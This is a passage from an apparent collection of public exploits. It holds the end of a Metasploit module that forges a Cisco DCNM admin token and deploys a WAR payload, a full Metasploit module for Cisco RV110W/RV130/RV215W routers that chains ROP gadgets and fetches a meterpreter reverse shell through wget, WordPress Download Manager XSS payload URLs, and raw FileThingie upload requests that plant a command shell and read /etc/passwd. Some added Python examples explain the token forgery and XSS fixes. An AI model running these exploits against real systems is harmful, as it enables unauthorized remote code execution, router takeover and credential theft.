    if target == targets[2]
      jsession = auth_v11
    elsif target == targets[3]
      jsession = auth_v10
    end

    # targets[1] DCNM 11.1(1) doesn't need auth!
    if jsession.nil? && target != targets[1]
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
    elsif target != targets[1]
      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
    end

    war_path = get_war_path
    if war_path.nil? or war_path.empty?
      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
    else
      print_good("#{peer} - Obtained WAR path from logs: #{war_path}")
    end

    # Generate our payload... and upload it
    app_base = rand_text_alphanumeric(6..16)
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
    fname = app_base + '.war'

    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
    post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
    post_data.add_part(war_payload, "application/octet-stream", 'binary', "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
      'method' => 'POST',
      'data'   => data,
      'cookie' => jsession,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    )

    if res && res.code == 200 && res.body[/#{fname}/]
      print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")
      sleep 10
      print_status("#{peer} - Executing payload...")
      send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, app_base),
        'method' => 'GET'
      )
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
    end
  end
end
```
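The authentication bypass in `auth_v10` is worth seeing on its own: the `pmreport` token is an MD5 over a username the client picks, a session id the client picks, a timestamp the server hands out in its `Date` header, and a constant string compiled into the product. Nothing in it is secret, so any client can mint an `admin` token. The following is an added example (not the module's code) in Python that reproduces the construction step by step, shows how a server trusting that scheme "verifies" it, and contrasts it with the shape that would have held up: a server-issued session id, a per-deployment random key, HMAC-SHA256, and an age check. The static string is the one quoted in the module; the HMAC key, session id and token lifetime are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import secrets
from email.utils import mktime_tz, parsedate_tz
from typing import Optional, Tuple

# Added example, not the Metasploit module's code. STATIC_SECRET is the constant the
# module quotes; the HMAC key, session id and lifetime below are demo assumptions.
STATIC_SECRET = "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"


def sys_time_from_date_header(date_header: str) -> int:
    """Server 'Date' header -> epoch milliseconds, matching the module's strftime('%s').to_i * 1000."""
    return mktime_tz(parsedate_tz(date_header)) * 1000


def forge_pmreport_token(sys_time_ms: int, username: str = "admin", session_id: Optional[str] = None) -> str:
    """Anyone who can read the Date header can build this: every input is client-known."""
    if session_id is None:
        session_id = str(secrets.randbelow(49001) + 1000)  # module uses rand(1000..50000)
    digest = hashlib.md5((username + session_id + str(sys_time_ms) + STATIC_SECRET).encode()).digest()
    return f"{session_id}.{sys_time_ms}.{base64.b64encode(digest).decode()}.{username}"


def token_parts(token: str) -> Tuple[str, int, bytes, str]:
    """Split sessionId.sysTime.b64(mac).username (username may itself contain dots)."""
    session_id, sys_time, mac_b64, username = token.split(".", 3)
    return session_id, int(sys_time), base64.b64decode(mac_b64), username


def server_check_vulnerable(token: str) -> bool:
    """What a server trusting the scheme does: recompute from the client's own values."""
    session_id, sys_time, digest, username = token_parts(token)
    expected = hashlib.md5((username + session_id + str(sys_time) + STATIC_SECRET).encode()).digest()
    return hmac.compare_digest(digest, expected)


def issue_hmac_token(server_key: bytes, session_id: str, username: str, now_ms: int) -> str:
    """Safer shape: server-chosen session id, per-deployment random key, HMAC-SHA256."""
    msg = f"{session_id}.{now_ms}.{username}".encode()
    mac = hmac.new(server_key, msg, hashlib.sha256).digest()
    return f"{session_id}.{now_ms}.{base64.b64encode(mac).decode()}.{username}"


def verify_hmac_token(server_key: bytes, token: str, now_ms: int, max_age_ms: int = 300_000) -> bool:
    """Reject stale tokens, then recompute the MAC with the key the client never sees."""
    session_id, issued_ms, mac, username = token_parts(token)
    if not 0 <= now_ms - issued_ms <= max_age_ms:
        return False
    expected = hmac.new(server_key, f"{session_id}.{issued_ms}.{username}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(mac, expected)


if __name__ == "__main__":
    # Constructed Date header; a real run would take it from the /fm/ response.
    sys_time = sys_time_from_date_header("Wed, 26 Jun 2019 12:00:00 GMT")
    forged = forge_pmreport_token(sys_time)
    print("forged token :", forged)
    print("accepted by vulnerable check:", server_check_vulnerable(forged))   # True
    key = secrets.token_bytes(32)
    print("accepted by HMAC check      :", verify_hmac_token(key, forged, sys_time))  # False
```

The module's `auth_v10` treats an HTTP 500 from `pmreport` as success because the servlet accepts the token and then fails on the missing report parameters; the example above stops at the token itself, which is the part that matters for the fix.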
16. * Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE: CVE-2019-15889

Description
--
In the pro features of the WordPress Download Manager plugin, there is a Category Short-code feature which can be used to sort categories with an order-by function, used as ?orderby=title,publish_date. By appending "> and any XSS payload to that parameter, the XSS payload will execute.

To reproduce,
1. Go to the link where we can find ?orderby
2. Append "> and give a simple payload like <script>alert(1)</script>
3. The payload will execute.

--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>

--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc

--
Another reflected cross-site scripting via advanced search
https://server/wpdmpro/advanced-search/
https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
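Both this Download Manager issue and the OpenCms `destinationDir.0` reflection in post 7 are the same bug: a request parameter pasted into an HTML attribute with nothing between it and the closing quote. The following is an added example (not the plugin's or OpenCms' code) in Python of the two fixes side by side: for `orderby`, where the set of legal values is known, an allow-list that refuses anything not a column name; for free-form values that must be echoed back, attribute encoding. The vulnerable link builder is included so the difference is visible on the advisory's own payload. The column list and URLs are assumptions taken from the advisory's examples.

```python
import html
from typing import Optional
from urllib.parse import urlencode

# Added example, not Download Manager or OpenCms code. The allowed column names are
# taken from the advisory's advanced-search parameters and are an assumption.
ALLOWED_ORDERBY = {"title", "publish_date", "update_date", "view_count", "download_count", "package_size"}
ALLOWED_ORDER = {"asc", "desc"}


def sort_link_vulnerable(base: str, orderby: str, order: str) -> str:
    """The pattern behind the advisory: raw parameters pasted into an href attribute."""
    return f'<a class="btn btn-primary" href="{base}?orderby={orderby}&order={order}">Asc</a>'


def safe_orderby(value: str) -> Optional[str]:
    """Allow-list: accept a comma list of known columns, reject anything else."""
    cols = [c.strip() for c in value.split(",") if c.strip()]
    if not cols or any(c not in ALLOWED_ORDERBY for c in cols):
        return None
    return ",".join(cols)


def sort_link(base: str, orderby: str, order: str) -> str:
    """Hardened builder: allow-listed values, URL-encoded query, HTML-escaped attribute."""
    ob = safe_orderby(orderby) or "title"
    od = order.lower() if order.lower() in ALLOWED_ORDER else "asc"
    href = base + "?" + urlencode({"orderby": ob, "order": od})
    return f'<a class="btn btn-primary" href="{html.escape(href, quote=True)}">{od.capitalize()}</a>'


def reflect_attr(value: str) -> str:
    """For free-form fields that must be echoed verbatim (OpenCms destinationDir.0): encode, don't filter."""
    return f'value="{html.escape(value, quote=True)}"'


if __name__ == "__main__":
    payload = 'publish_date"><script>alert(11)</script>'
    base = "https://server/wpdmpro/category-short-code/"
    print(sort_link_vulnerable(base, payload, "asc"))
    print(sort_link(base, payload, "asc"))
    print(reflect_attr('testszfgw"><script>alert(1)</script>vqln7'))
```

Encoding alone would also have closed both holes; the allow-list is preferable for `orderby` because the value ends up in a database ORDER BY clause as well, where HTML escaping is the wrong defence.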
  17.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Deprecated

  moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
      'Description' => %q{
        A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
        Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow
        an unauthenticated, remote attacker to execute arbitrary code on an affected device.

        The vulnerability is due to improper validation of user-supplied data in the web-based management
        interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a
        targeted device. A successful exploit could allow the attacker to execute arbitrary code on the
        underlying operating system of the affected device as a high-privilege user.

        RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
        RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.

        Note: successful exploitation may not result in a session, and as such, on_new_session will never
        repair the HTTP server, leading to a denial-of-service condition.
      },
      'Author'      => [
        'Yu Zhang',                          # Initial discovery (GeekPwn conference)
        'Haoliang Lu',                       # Initial discovery (GeekPwn conference)
        'T. Shiomitsu',                      # Initial discovery (Pen Test Partners)
        'Quentin Kaiser <[email protected]>' # Vulnerability analysis & exploit dev
      ],
      'License'         => MSF_LICENSE,
      'Platform'        => %w[linux],
      'Arch'            => [ARCH_ARMLE, ARCH_MIPSLE],
      'SessionTypes'    => %w[meterpreter],
      'CmdStagerFlavor' => %w{ wget },
      'Privileged'      => true, # BusyBox
      'References'      => [
        ['CVE', '2019-1663'],
        ['BID', '107185'],
        ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
        ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
      ],
      'DefaultOptions'  => {
        'WfsDelay'          => 10,
        'SSL'               => true,
        'RPORT'             => 443,
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD'           => 'linux/mipsle/meterpreter_reverse_tcp',
      },
      'Targets'         => [
        [ 'Cisco RV110W 1.1.0.9',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af06000,
            'libcrypto_base_addr' => 0x2ac01000,
            'system_offset' => 0x00050d40,
            'got_offset' => 0x0009d560,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV110W 1.2.0.9',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af08000,
            'libcrypto_base_addr' => 0x2ac03000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV110W 1.2.0.10',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af09000,
            'libcrypto_base_addr' => 0x2ac04000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV110W 1.2.1.4',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af54000,
            'libcrypto_base_addr' => 0x2ac4f000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV110W 1.2.1.7',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af98000,
            'libcrypto_base_addr' => 0x2ac4f000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV130/RV130W < 1.0.3.45',
          {
            'offset' => 446,
            'libc_base_addr' => 0x357fb000,
            'system_offset' => 0x0004d144,
            'gadget1' => 0x00020e79, # pop {r2, r6, pc};
            'gadget2' => 0x00041308, # mov r0, sp; blx r2;
            'Arch' => ARCH_ARMLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' }
          },
        ],
        [ 'Cisco RV215W 1.1.0.5',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af59000,
            'libcrypto_base_addr' => 0x2ac54000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV215W 1.1.0.6',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af59000,
            'libcrypto_base_addr' => 0x2ac54000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV215W 1.2.0.14',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af5f000,
            'libcrypto_base_addr' => 0x2ac5a001,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV215W 1.2.0.15',
          {
            'offset' => 69,
            'libc_base_addr' => 0x2af5f000,
            'libcrypto_base_addr' => 0x2ac5a000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x00098db0,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV215W 1.3.0.7',
          {
            'offset' => 77,
            'libc_base_addr' => 0x2afeb000,
            'libcrypto_base_addr' => 0x2aca5000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x000a0530,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
        [ 'Cisco RV215W 1.3.0.8',
          {
            'offset' => 77,
            'libc_base_addr' => 0x2afee000,
            'libcrypto_base_addr' => 0x2aca5000,
            'system_offset' => 0x0004c7e0,
            'got_offset' => 0x000a0530,
            # gadget 1 is in /usr/lib/libcrypto.so
            'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
            'Arch' => ARCH_MIPSLE,
            'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' }
          }
        ],
      ],
      'DisclosureDate' => 'Feb 27 2019',
      'DefaultTarget'  => 0,
      'Notes'          => {
        'Stability' => [ CRASH_SERVICE_DOWN, ],
      },
    ))
  end

  def p(lib, offset)
    [(lib + offset).to_s(16)].pack('H*').reverse
  end

  def prepare_shellcode(cmd)
    case target
    # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
    # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
    when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6],
         targets[7], targets[8], targets[9], targets[10], targets[11]
      shellcode = rand_text_alpha(target['offset']) + # filler
        rand_text_alpha(4) + # $s0
        rand_text_alpha(4) + # $s1
        rand_text_alpha(4) + # $s2
        rand_text_alpha(4) + # $s3
        p(target['libc_base_addr'], target['system_offset']) + # $s4
        rand_text_alpha(4) + # $s5
        rand_text_alpha(4) + # $s6
        rand_text_alpha(4) + # $s7
        rand_text_alpha(4) + # $s8
        p(target['libcrypto_base_addr'], target['gadget1']) + # $ra
        p(target['libc_base_addr'], target['got_offset']) +
        rand_text_alpha(28) +
        cmd
      shellcode
    when targets[5] # RV130/RV130W
      shellcode = rand_text_alpha(target['offset']) + # filler
        p(target['libc_base_addr'], target['gadget1']) +
        p(target['libc_base_addr'], target['system_offset']) + # r2
        rand_text_alpha(4) + # r6
        p(target['libc_base_addr'], target['gadget2']) + # pc
        cmd
      shellcode
    end
  end

  def send_request(buffer)
    begin
      send_request_cgi({
        'uri'       => '/login.cgi',
        'method'    => 'POST',
        'vars_post' => {
          "submit_button": "login",
          "submit_type": "",
          "gui_action": "",
          "wait_time": 0,
          "change_action": "",
          "enc": 1,
          "user": rand_text_alpha_lower(5),
          "pwd": buffer,
          "sel_lang": "EN"
        }
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
    end
  end

  def check
    # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
    # We use lang_pack/EN.js because it's the one file that changes the most between versions.
    # Note that it's not a smoking gun given that some branches keep the exact same files in /www
    # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
    fingerprints = {
      "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
        "version" => "Cisco RV110W 1.1.0.9",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
        "version" => "Cisco RV110W 1.2.0.9",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "134ee643ec877641030211193a43cc5e93c96a06" => {
        "version" => "Cisco RV110W 1.2.0.10",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
        "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
        "status" => Exploit::CheckCode::Unknown
      },
      "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
        "version" => "Cisco RV130/RV130W 1.0.0.21",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "9b1a87b752d11c5ba97dd80d6bae415532615266" => {
        "version" => "Cisco RV130/RV130W 1.0.1.3",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "9b6399842ef69cf94409b65c4c61017c862b9d09" => {
        "version" => "Cisco RV130/RV130W 1.0.2.7",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
        "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "8c8e05de96810a02344d96588c09b21c491ede2d" => {
        "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
        "status" => Exploit::CheckCode::Unknown
      },
      "2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
        "version" => "Cisco RV215W 1.1.0.5",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
        "version" => "Cisco RV215W 1.1.0.6",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
        "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
        "status" => Exploit::CheckCode::Vulnerable
      },
      "050d47ea944eaeadaec08945741e8e380f796741" => {
        "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
        "status" => Exploit::CheckCode::Unknown
      }
    }

    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'lang_pack/EN.js')
    })

    if res && res.code == 200
      fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
      if fingerprints.key?(fingerprint)
        print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
        return fingerprints[fingerprint]["status"]
      else
        print_status("Couldn't reliably fingerprint the target.")
      end
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status('Sending request')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    shellcode = prepare_shellcode(cmd.to_s)
    send_request(shellcode)
  end

  def on_new_session(session)
    # Given there is no process continuation here, the httpd server will stop
    # functioning properly and we need to take care of proper restart
    # ourselves.
    print_status("Reloading httpd service")
    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
    else
      session.shell_command(reload_httpd_service)
    end
  ensure
    super
  end
end
  18.
# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
# Author: Cakes
# Discovery Date: 2019-09-03
# Vendor Homepage: www.solitude.dk/filethingie
# Software Link: https://github.com/leefish/filethingie/archive/master.zip
# Tested Version: 2.5.7
# Tested on OS: CentOS 7
# CVE: N/A
# Intro:
# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives

::::: POST .zip file with cmd shell

POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
Content-Length: 1117
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
Content-Type: application/octet-stream


-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip"
Content-Type: application/zip

[binary ZIP archive data omitted; the archive contains cmdshell.php]
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="act"

upload
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="dir"

/tester
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="submit"

Upload
-----------------------------3402520321248020588131184034--

::::::::::::::::::::::::::::: Unzip Malicious file

POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip

:::::::::::::::::::::::::::::: Access your shell

GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0

:::::::::::::::::::::::::::::: Read /etc/passwd

GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
